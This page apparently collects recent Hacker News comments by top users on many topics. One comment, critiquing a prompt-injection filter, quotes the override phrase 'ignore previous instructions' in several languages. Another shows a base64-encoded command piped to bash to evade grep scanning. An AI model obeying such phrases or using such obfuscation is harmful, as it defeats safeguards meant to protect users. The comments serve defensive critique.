What are the most upvoted users of Hacker News commenting on? Powered by the /leaders top 50 and updated every thirty minutes. Made by @jamespotterdev.
This is a lot of cryptography, but how is it better than the hundred previous attempts, that simply hashed the input?
https://www.effectivealtruism.org/ at scale. Kindness, listening, time, and charity to those around you at the microcosm level.
As I understood it, the "issues" were more like todo list items of "look into whether this is an actual problem" than "this should be fixed".
That's a very interesting way of looking at it. Yes, you start with simulating something simpler than the real world. Then you use the real world. Then you need to go back to simulations for real-world things that are too rare in the real world to train with.
Seems like there ought to be a name for this, like so-and-so's law.
If it "was AI" it should be easy enough for him to prove by pulling up his account on whatever AI video generation service he used and showing the generation in his account history.
(I do not think it was AI.)
> I kept finding myself using a small amount of the features while the rest just mostly got in the way. So a few years ago I set out to build a design tool just like I wanted. So I built Vecti with what I actually need...
Joel Spolsky said (I'm paraphrasing) that everybody only uses 20% of a given program's features, but the problem is that everyone is using a different 20%, so you can't ship an "unbloated" version and expect it to still work for most people.
So it looks like you've built something really cool, but I have to ask what makes you think that the features that are personally important to you are the same features that other potential users need? Since this clearly seems to be something you're trying to create a business out of rather than just a personal hobby project. I'm curious how you went about customer research and market validation for the specific subset of features that you chose to develop?
Air Canada is responsible for chatbot's mistake: B.C. tribunal - https://news.ycombinator.com/item?id=39378235 - February 2024 (420 comments)
https://jerf.org/iri/post/2025/fp_lessons_purity/ may help, perhaps even especially if you are not a functional programmer.
See also https://jerf.org/iri/post/2958/ .
The author is the founder of Hasicorp. He created Vault and Terraform, among others.
This reads more like "we won't deliberately turn the lights off… but they're probably gonna break on their own eventually".
> crush as a young teenager was Burn
Who hadn't?
I was a young adult back then, but the sense of adventure in the movie brought my memories of BBSs and creative misuse of telephone lines, X.400 networks, and dial-out modems. Fun times.
Trump’s Prescription Drug Website Exposed as a Big Fat Scam - https://newrepublic.com/post/206265/trump-prescription-drug-... - February 6th, 2026
https://x.com/cturnbull1968/status/2019602529278136786 | https://archive.today/IG7Au
https://x.com/okcreports/status/2019655323137589399 | https://archive.today/mbMdd
I remember being at Summercon before this movie opened and Ericb addressing hotel conference room we were seated in talking about how Iain Softley had directed Backbeat and how happy he was that he was doing this movie and that you had to get in the right headspace to understand what it was going for.
(I think the movie is wildly overrated just as a piece of storytelling; the hacker fan-service in it is just fine, they clearly got some tfile kids to consult with the script.)
> Yes, I suppose there exists an egalitarian and well adjusted hypothetical society where we could find good leaders by random draw.
If you can find good leaders by random draw, that means the average citizen is a good leader, which would seem to suggest that the average citizen should be a reasonable an hard-to-dupe judge of good leaders, and therefore that elections also work well.
If elections don't work well to select leaders, that's a pretty good piece of evidence that sortition won't, either.
OTOH, the particular failures of sortition and elections may be different, and using a system where both are used for different veto points might be net less problematic than either alone. Consider a bicameral legislature with one house chosen by elections and the other by sortition, for instance.
(OTOH, there is plenty of solid evidence in comparative government of how to do electoral democracy better and people in the US don't seem too interested in that, which is probably a better focus for immediate reform than relatively untested, on a large scale, ideas about avoiding electoral democracy.)
People who race stock cars will even dip body panels into acid to make the panels thinner. Anything to reduce weight!
Isn't use of the internet to facilitate crimes commonly cited as a reason for federal prosecution, on the grounds that all internet communications involve interstate commerce?
> Yeah but calling someone a racist is a serious accusation, you better bring receipts or be liable for defamation
There are a large number of countries with their own systems of law, and its possible that in one of them calling someone a racist might be subject to defamation law, but in most I am aware of that's going to be a problem because its not even a well-enough-defined fact claim to be legally true or false.
I don't think that's in evidence. Institutionalized and ideologically-driven apathy towards the fraud, sure, but that's not uncommon (see: the defense industry; the finance industry).
Sure. But:
> Over three weeks, jurors weighed the harrowing personal account of Ms. Dean as well as testimony from Uber executives and thousands of pages of internal company documents, including some showing that Uber had flagged her ride as a higher risk for a serious safety incident moments before she was picked up.
Thus, civil liability. The rapist still goes down for the crime part.
'Excuses are over': Stellantis tells dealers sales must grow this year - https://www.detroitnews.com/story/business/autos/chrysler/20... | https://archive.today/y16BG - February 5th, 2026
> This is the year that Stellantis NV's U.S. vehicle sales must start growing again, after seven straight annual declines and prior promises that a recovery was just around the corner.
> That was the blunt takeaway from a packed closed-door meeting on Wednesday between the automaker's senior executives and much of its 2,400-member dealer body at the National Automobile Dealers Association annual convention.
> "2026 is the year of execution, and we're counting on our dealers to deliver," Jeff Kommor, who leads U.S. sales for Stellantis, told The Detroit News after the meeting. "We've given them all the tools that they need. Excuses are over. There are no more excuses."
> Stellantis U.S. market share has hovered around 8% the last two years, a steep decline from its 12.5% or so share as recently as 2020 under its predecessor company.
Cooked.
Microsoft employ over 100,000 engineers. I'd advise against assuming that everything produced by any of them is bad because of bugs in Windows.
The Pandora box is already open.
There are people playing around with straight machine code generation, or integrating ML into the optimisation backend, finally compiling via a translation to an existing language is already a given in vibe coding with agents.
Speaking of which, using agentic runtimes is hardly any different from writing programs, there are some instructions which then get executed just like any other applications, and if it gets compiled before execution or plainly interpreted, becomes a runtime implementation detail.
Are we there yet without hallucinations?
Not yet, however the box is already open, and there are enough people trying to make it happen.
I wished more of the web was like this.
if you like this you may also like:
Other carmakers are withdrawing entirely from affordable vehicles, what do they expect?
> What would targeting NYC help Iran?
I don’t think modelling Iran as a monolithic political actor works anymore.
Between the IRGC, President, clerical ranks and others, I’m sure, some groups may benefit from striking New York or even inviting American retaliation in ways that don’t make sense for the country as a whole.
I'm one of the people who posted about using scripts/make in the HN comment thread on the previous blogpost, and I really appreciate the nuance in this followup.
I think what I and others are tripping on in the argument is that the articles seem to be trying to encapsulate everything a CI system can do into one global digraph that includes all build steps for creating artifacts and then all test steps (including unit and integration test).
I would argue that in the quite excellent Build Systems à la Carte paper referenced, the focus is on the first build part, not one all encompassing katamari. Separating build from test has some great advantages, such as being able to reuse build artifacts. Local tools like scripts/make are great for this as they're self contained. That's really the entirety of the past comment, and seems to concur with this article.
Much of the later part is on shared resource issues. If you need an orchestrator because tools are badly behaved and try to grab and hold finite resources, is that the right decision? Or is it the tools that should be fixed or avoided?
To be expected, given how many organisations now require employees to use AI if they want to meet their OKRs, especially all that sell AI tools.
The biggest issue with DNS is not the protocol, or even the reference implementation. It's the people who think they are clever and try to make things better by making them worse.
The most egregious of course is ISPs rewriting TTLs (or resolvers that just ignore them). But there are other implementation issues too, like caching things that shouldn't be or doing it wrong. I've seen resolvers that cache a CNAME and the A record it resolves to with the TTL of the CNAME (which is wrong).
I'm also very concerned about the "WHY DNS MATTERS FOR SYSTEM DESIGN" section. While everything there is correct enough, it doesn't dive into the implication of each and how things go wrong.
For example, using DNS for round robin balancing is an awful idea in practice. Because Comcast will cache one IP of three, and all of a sudden 60% of your traffic is going to one IP. Similar issue with regional IPs. There are so many ways for the wrong IP to get into a cache.
There is a reason we say "it's always DNS".
Nice to see the admin can even flub basic math.
$1,449 --> $252 is "93% off", apparently?
Waymo has been operating since 2004 (22 years ago), and replacing drivers on the road will take many more decades. Nothing is happening "overnight".
Additional citation:
TikTok’s ‘Addictive Design’ Found to Be Illegal in Europe - https://news.ycombinator.com/item?id=46911869 - February 2026
tweet inlined:
Heroku is transitioning to a sustaining engineering model focused on stability, security, reliability, and support. Heroku remains an actively supported, production-ready platform, with an emphasis on maintaining quality and operational excellence rather than introducing new features. We know changes like this can raise questions, and we want to be clear about what this means for customers.
There is no change for customers using Heroku today. Customers who pay via credit card in the Heroku dashboard—both existing and new—can continue to use Heroku with no changes to pricing, billing, service, or day-to-day usage. Core platform functionality, including applications, pipelines, teams, and add-ons, is unaffected, and customers can continue to rely on Heroku for their production, business-critical workloads.
Enterprise Account contracts will no longer be offered to new customers. Existing Enterprise subscriptions and support contracts will continue to be fully honored and may renew as usual.
Why this change
We’re focusing our product and engineering investments on areas where we can deliver the greatest long-term customer value, including helping organizations build and deploy enterprise-grade AI in a secure and trusted way.
Kary B. Mullis Nobel Prize lecture Nobel Lecture, December 8, 1993
The Polymerase Chain Reaction
https://www.nobelprize.org/prizes/chemistry/1993/mullis/lect...
> More housing in region X will result in lower housing prices in region Y.
Or higher prices in Y, because X will be both more crowded and with on average poorer people than before the supply increase, and people who prefer a less crowded area and less poor people (either directly because they are poor, or because of other demographic traits that correlate with wealth in the broader society, like race in the USA) around them will have an even higher relative preference for living in Y than before.
> The interests of people from region Y are valid.
They exist, validity is...at best, not a case you have made. Existence of a material interest does not imply validitym
> I don't understand why people think they know why stocks move up or down.
Inferring overly generalized and usually incorrect causal relations from extremely limited data and treating them as conclusive is a very strong human tendency; the idea of avoiding that and taking a systematic, structured, and conditional approach to assessing causal claims is fairly recent and, even among people who generally support it, often adhered to more as an aspirational principal than a consistent practice. And it certainly doesn't sell clicks the way the old way does.
I wonder how much money Salesforce would need to sell what's left of Heroku to a better steward.
"RISC architecture is gonna change everything." :)
There are three things that I usually do when I’m anxious, waiting for something, and not at my desk: (i) Read a Book, (ii) Play Chess, or (iii) Re-watch the Knots 3D on the Phone.
Many people are spending significantly more time every day engaging with AI chatbots than they spend engaging with Google, and Google is one of the most valuable companies in the world.
> On Friday, the regulators released a preliminary decision that TikTok’s infinite scroll, auto-play features and recommendation algorithm amount to an “addictive design” that violated European Union laws for online safety.
How is this any different from Reddit? From Instagram? Why single out TikTok?
Applying laws unevenly is a form of discrimination.
Your regular expressions here only cover English: https://github.com/sibyllinesoft/scurl/blob/5b5bc118dc47b138...
Prompt injection strings can use any language the model knows, so "ignore previous instructions" could become "ignorer les instructions précédentes" or "تجاهل التعليمات السابقة" or "aurreko argibideak alde batera utzi" or "忽略之前的指令"...
> Why would a less legitimate company not pay more money to give you a worse deal with better margins?
Because what matters is the total spend per resulting purchase, not spend per impression.
Because spam ad companies have a very tiny conversion rate, they can only pay a very small amount per impression before it becomes unprofitable.
Legitimate companies aren't usually trying to completely trick their customers. They are selling an actual halfway decent or good quality product. Therefore, if they are targeting well, they have a much much higher conversion rate and can therefore pay much more per impression.
That was editorializing by the person who submitted it, I didn't use that language in my post.
The random-clickers have been around for a while, clicking through ads to try to break profiles on users and cost the ad networks more money than it is worth.
They have not been very successful in their goals. I suspect, without sarcasm, that that is because compared to the absolutely routine click-fraud conducted up and down the entire ad space at every level, those plugin's effects literally didn't even register. It's an arms race and people trying to use ad blockers to not just block the ads but corrupt them are coming armed with a pea shooter to an artillery fight, not because they are not very clever themselves but just without a lot of users they can't even get the needle to twitch.
A lot of people are mentally modeling the idea that LLMs are either now or will eventually be infinitely capable. They are and will stubbornly persist in being finite, no matter how much capacity that "finite" entails. For the same reason that higher level languages allow humans to worry less about certain details and more about others, higher level languages will allow LLMs to use more of their finite resources on solving the hard problems as well.
Using LLMs to do something like what a compiler can already do is also modelling LLMs as infinite rather than finite. In fact in this particular situation not only are they finite, they're grotesquely finite, in particular, they are expensive. For example, there is no world where we just replace our entire infrastructure from top to bottom with LLMs. To see that, compare the computational effort of adding 10 8-digit numbers with an LLM versus a CPU. Or, if you prefer something a bit less slanted, the computational costs of serving a single simple HTTP request with modern systems versus an LLM. The numbers run something like LLMs being trillions of times more expensive, as an opening bid, and if the AIs continue to get more expensive it can get even worse than that.
For similar reasons, using LLMs as a compiler is very unlikely to ever produce anything even remotely resembling a payback versus the cost of doing so. Let the AI improve the compiler instead. (In another couple of years. I suspect today's AIs would find it virtually impossible to significatly improve an already-optimized compiler today.)
Moreover, remember, oh, maybe two years back when it was all the rage to have AIs be able to explain why they gave the answer they did? Yeah, I know, in the frenzied greed to be the one to grab the money on the table, this has sort of fallen by the wayside, but code is already the ultimate example of that. We ask the LLM to do things, it produces code we can examine, and the LLM session then dies away leaving only the code. This is a good thing. This means we can still examine what the resulting system is doing. In a lot of ways we hardly even care what the LLM was "thinking" or "intending", we end up with a fantastically auditable artifact. Even if you are not convinced of the utility of a human examining it, it is also an artifact that the next AI will spend less of its finite resources simply trying to understand and have more left over to actually do the work.
We may find that we want different programming languages for AIs. Personally I think we should always try to retain that ability for humans to follow it, even if we build something like that. We've already put the effort into building AIs that produce human-legible code and I think it's probably not that great a penalty in the long run to retain that. At the moment it is hard to even guess what such a thing would look like, though, as the AIs are advancing far faster than anyone (or any AI) could produce, test, prove out, and deploy such a language, against the advantage of other AIs simply getting better at working with the existing coding systems.
I looked a lot into the "universal paywall" business model where one subscription buys you access to articles from a wide range of news outlets. It's close to impossible to execute because the most prestigious outlets (ahem... The New York Times) won't give you the time of the day, even if you are startup royalty. That Apple has accomplished anything in this space is remarkable.
"Ownership" is a bad smell. Reminds me of the high-pressure pitch used to sell vacation timeshares. Why pay a huge amount up front when you could save the money and go have a vacation at any resort anywhere in the world whenever you want?
Hah, good one, I should have known it probably had been posted before.
Unless they can be guaranteed by the POSIX specification, they are implementation specific and should not be relied upon for portable code.
No wonder it is so slow to load.
Personally I love having a programming buddy I can talk with about everything.
It's not the "state of nature", but there's obviously been a lot of litigation and regulation in the meantime. Look up the charmingly named Carbolic Smoke Ball case, for example.
Are you in the US? Lots of people have reported that the forced sale "ruined" their algorithm.
Because the sets of people who would give money to this and people who notice the Gemini logo are disjoint.
I would assert any company that doesn't go bankrupt is successful, doesn't need to be late stage capitalism.
Other than that, Nokia until Microsoft placed an agent on it, Phillips that contributed to CDs, ASML...
There is a fundamental difference between settlers, who create a society, and immigrants, who move into a society that already exists. America was established by mostly British settlers. Folks on HN of all places should be able to understand the importance of founders.
It's self-evident that this difference between settlers and immigrants has a huge impact. Australia, Canada, and the United States are very similar to each other in terms of language, law, economics, etc. But the U.S. separated from the parent society, Britain, 250 years ago. Subsequently, those countries underwent completely different immigration patterns. So why are those countries so similar? It's because of the difference between settlers and immigrants.
Immigrants account for ~98% of the American population.
Correct. If you conceive of the “rule of law” as being the operating system kernel on top of which the rest of society runs, then there are no checks on the law enforcers and interpreters.
This is not a theoretical problem. Prosecuting politicians is a preferred approach in dysfunctional democracies, like Pakistan: https://www.bbc.com/news/articles/cly77v0n8e9o
I don't think that's true. The 'this battle is already over' attitude is the most defeatist strategy possible. It's effectively complying in advance, rolling over before you've attempted to create the best possible outcome.
With that attitude we would not have voting, human rights (for what they're worth these days), unions, a prohibition on slavery and tons of other things we take for granted every day.
I'm sure AI has its place but to see it assume the guise of human output without any kind of differentiating factor has so many downsides that it is worth trying to curb the excesses. And news articles in particular should be free from hallucinations because they in turn will cause others to pass those on. Obviously with the quality of some publications you could argue that that is an improvement but it wasn't always so and a free and capable press is a precious thing.
He got off way too light.
In a way it doesn't surprise me one bit. In a world in which everybody is told they're important you get people who actually believe that they are more important than others to a degree they start seeing them as NPCs. And you don't actually care about NPCs getting inconvenienced or even killed as long as you are marginally safer yourself. I've seen someone wearing a t-shirt that said 'I'm a big deal'. I kid you not.
This is a fascinating experiment! I've just been reading the first few paragraphs of the paper ... easily readable, intended to be accessible by anyone.
In Gauss's time mathematicians would solve problems, publish the solutions in an encrypted form, and then challenge their contemporaries to solve the problems.
Here the authors of a paper on the arXiv say:
"To assess the ability of current AI systems to correctly answer research-level mathematics questions, we share a set of ten math questions which have arisen naturally in the research process of the authors. The questions had not been shared publicly until now; the answers are known to the authors of the questions but will remain encrypted for a short time."
Tao says:
"... the challenge is to see whether 10 research-level problems (that arose in the course of the authors research) are amenable to modern AI tools within a fixed time period (until Feb 13).
"The problems appear to be out of reach of current "one-shot" AI prompts, but were solved by human domain experts, and would presumably a fair fraction would also be solvable by other domain experts equipped with AI tools. They are technical enough that a non-domain-expert would struggle to verify any AI-generated output on these problems, so it seems quite challenging to me to have such a non-expert solve any of these problems, but one could always be surprised."
It's confusing to me how this needs to be spelled out. It seems pretty obvious and anybody in IT should know - long before the general public - that Gates is a complete asshole.
There's a lot of history around what radio was supposed to be for. Little of that history appears in the article. In the US, there was a real question over whether there would be lots of little AM stations or a few huge ones with nationwide coverage. One proposal was to cover the entire continent with three high power AM stations.
But in 1938, Congress decided otherwise.[1]
Resolved, That it is the sense of the Senate of the United States of America that the operation of radio broadcast stations in the standard broadcast band (550 to 1600 kilocycles) with power in excess of 50 kilowatts is definitely against the public interest, in that such operation would tend to concentrate political, social, and economic power and influence in the hands of a very small group, and is against the public interest for the further reason that the operation of broadcast stations with power in excess of 50 kilowatts has been demonstrated to have adverse and injurious economic effects on other stations operating with less power, in depriving such stations of revenue and in limiting the ability of such stations to adequately or efficiently serve the social, religious, educational, civic, and other like organizations and institutions in the communities in which such stations are located and which must and do depend on such stations for the carrying on of community welfare work generally.
Not something we'd expect from Congress today. That's why, during the era when standard broadcast AM dominated, there were many, many local AM radio stations.
The 50KW AM power limit is still in effect, but has been overridden by stations being under common ownership via buyouts and mergers.
Prohibiting disassembling is worth about as much as "do not open, no user-serviceable parts inside" warnings ---- you are a true hacker only if you ignore them.
My terminal is set to CP437 and uses a font incapable of rendering anything else.
Then again, I don't blindly pipe directly from the network into the shell either.
The trouble with C as an API format is that there's no size info. That's asking for buffer overflows.
There's an argument for full type info at an API, but that gets complicated across languages. Things that do that degenerate into CORBA. Size info, though, is meaningful at the machine level, and ought to be there.
Apple originally had Pascal APIs for the Mac, which did carry along size info. But they caved and went with C APIs.
...such as talking directly to AMD or even Microsoft, which is scarier as Windows Updates are signed, and as long as they can be convinced to sign the right thing, it'll look even more legit.
Tell that to Mitchell Hashimoto.
They might also be doing it for the sake of a better future for their children, not just for themselves.
I tend to disagree with this as it seems like an ad for Nix/Buildkite...
If your CI invocations are anything more than running a script or a target on a build tool (make, etc.) where the real build/test steps exist and can be run locally on a dev workstation, you're making the CI system much more complex than it needs to be.
CI jobs should at most provide an environment and configuration (credentials, endpoints, etc.), as a dev would do locally.
This also makes your code CI agnostic - going between systems is fairly trivial as they contain minimal logic, just command invocations.
The only thing cited here is a response from their bug bounty program. Excluding MITM from a bug bounty is perfectly legitimate. Actually, excluding anything from a bounty program is.
I don't think it's debatable.
To drive home the ridiculousness of this, Bitcoin traded around $126k in October. It’s now at $60k. Even if it recovers, that’s an 87% annualized loss.
That’s a 669% inflation rate.
Asimov in 1980 didn't have access to "Orwell, the Lost Writings", published in 1985. That details Eric Blair's ("Orwell" is a pseudonym) jobs during WWII, mostly at the British Ministry of Information. "1984"'s details are partly autobiographical. One of Blair's jobs was to translate news broadcasts into Basic English for broadcast to the colonies, primarily India and Hong Kong. He found that this was a political act. Squeezing news down to a 1000 word vocabulary required removing political ambiguity. It's hard to prevaricate in Basic English, which has a very concrete vocabulary. Hence Newspeak.
The details of Winston Smith's job are close to Blair's job. The rather bleak canteen matches the one at the Ministry of Information. A middle manager above Blair had the initials "B B", and that's where Big Brother comes from. The low quality gin, cigarettes, and razor blades are the WWII British experience.
"1984" is in some ways Dilbert, with more politics.
"Eric, from Hong Kong, began watching secretly filmed videos as a teenager, attracted by how 'raw' the footage was.
'What drew me in is the fact that the people don't know they're being filmed,' says Eric, now in his 30s. 'I think traditional porn feels very staged, very fake.'"
> You guys are putting a lot of trust into vibe-coded software...
Nope. I'm putting a lot of trust in American Express and the continued availability of Claude competitors.
The latest and greatest is not great for you, but for them.
The music slows, it has not stopped. Watch the debt and private credit markets for signal.
Everything you describe, relational databases have been doing for decades. It's not unique to Postgres.
https://x.com/ycombinator/status/2019456167362072827 | https://archive.today/bO4Z8
Related:
Adding Canada Back to Our List of Accepted Countries of Incorporation - https://news.ycombinator.com/item?id=46901794 - February 2026
HN Search: Y Combinator Canada - https://hn.algolia.com/?dateRange=pastMonth&page=0&prefix=tr...
If you know it’s coming, you can command the panels on single axis trackers to avoid damage. This is done today for hail and hurricane risk. Panels are also rated to withstand all but the most aggressive hail.
Maybe people hope they get paid for holding it just like people get paid to watch the hideous movie.
> Or perhaps write a complier for a new language that someone just invented, after writing a first draft of a spec for it.
Hello, this is what I did over my Christmas break. I've been taking some time to do other things, but plan on returning to it. But this absolutely works. Claude has written far more programs in my language than I have.
https://rue-lang.dev/ if you want to check it out. Spec and code are both linked there.
grep won't catch this:
echo 'Y3VybCBodHRwczovL2V4YW1wbGUuY29tLw==' | base64 -d | bash
It's pretty humorous to watch it play out. The US overplayed a hand it thought it had, and is simply unhappy with the "Find Out" component. Ah, well, it'll be an interesting natural macro and trade experiment.
They are obviously losing money on training. I think they are selling inference for less than what it costs to serve these tokens.
That really matters. If they are making a margin on inference they could conceivably break even no matter how expensive training is, provided they sign up enough paying customers.
If they lose money on every paying customer then building great products that customers want to pay for them will just make their financial situation worse.
Prove that you need the extra speed.
Run benchmarks that show that, for your application under your expected best-case loads, using Redis for caching instead of PostgreSQL provides a meaningful improvement.
If it doesn't provide a meaningful improvement, stick with PostgreSQL.
https://metr.org/blog/2025-07-10-early-2025-ai-experienced-o...
> 1) We do NOT provide evidence that AI systems do not currently speed up many or most software developers. Clarification: We do not claim that our developers or repositories represent a majority or plurality of software development work.
> 2) We do NOT provide evidence that AI systems do not speed up individuals or groups in domains other than software development. Clarification: We only study software development.
> 3) We do NOT provide evidence that AI systems in the near future will not speed up developers in our exact setting. Clarification: Progress is difficult to predict, and there has been substantial AI progress over the past five years [3].
> 4) We do NOT provide evidence that there are not ways of using existing AI systems more effectively to achieve positive speedup in our exact setting. Clarification: Cursor does not sample many tokens from LLMs, it may not use optimal prompting/scaffolding, and domain/repository-specific training/finetuning/few-shot learning could yield positive speedup.
I have no other accounts on HN except throwaways previously created with mod permission. I cannot speak to any comments written by others using the content of my own.
> This idea that there's some kind of difference between me watching you in public and Flock watching you in public is, quite frankly, bogus.
The idea that there's not a scale difference is, quite frankly, bogus.
This is a good rebuttal to the "it was in the training data" argument - if that's how this stuff works, why couldn't Opus 4.5 or any of the other previous models achieve the same thing?
> The point is that reading the code is more time consuming than writing it, and has always been thus.
Huh?
First, that is definitely not true.
And second, even if it were true, you have to read it for code review even if it was written by a person anyways, if we're talking about the context of a team.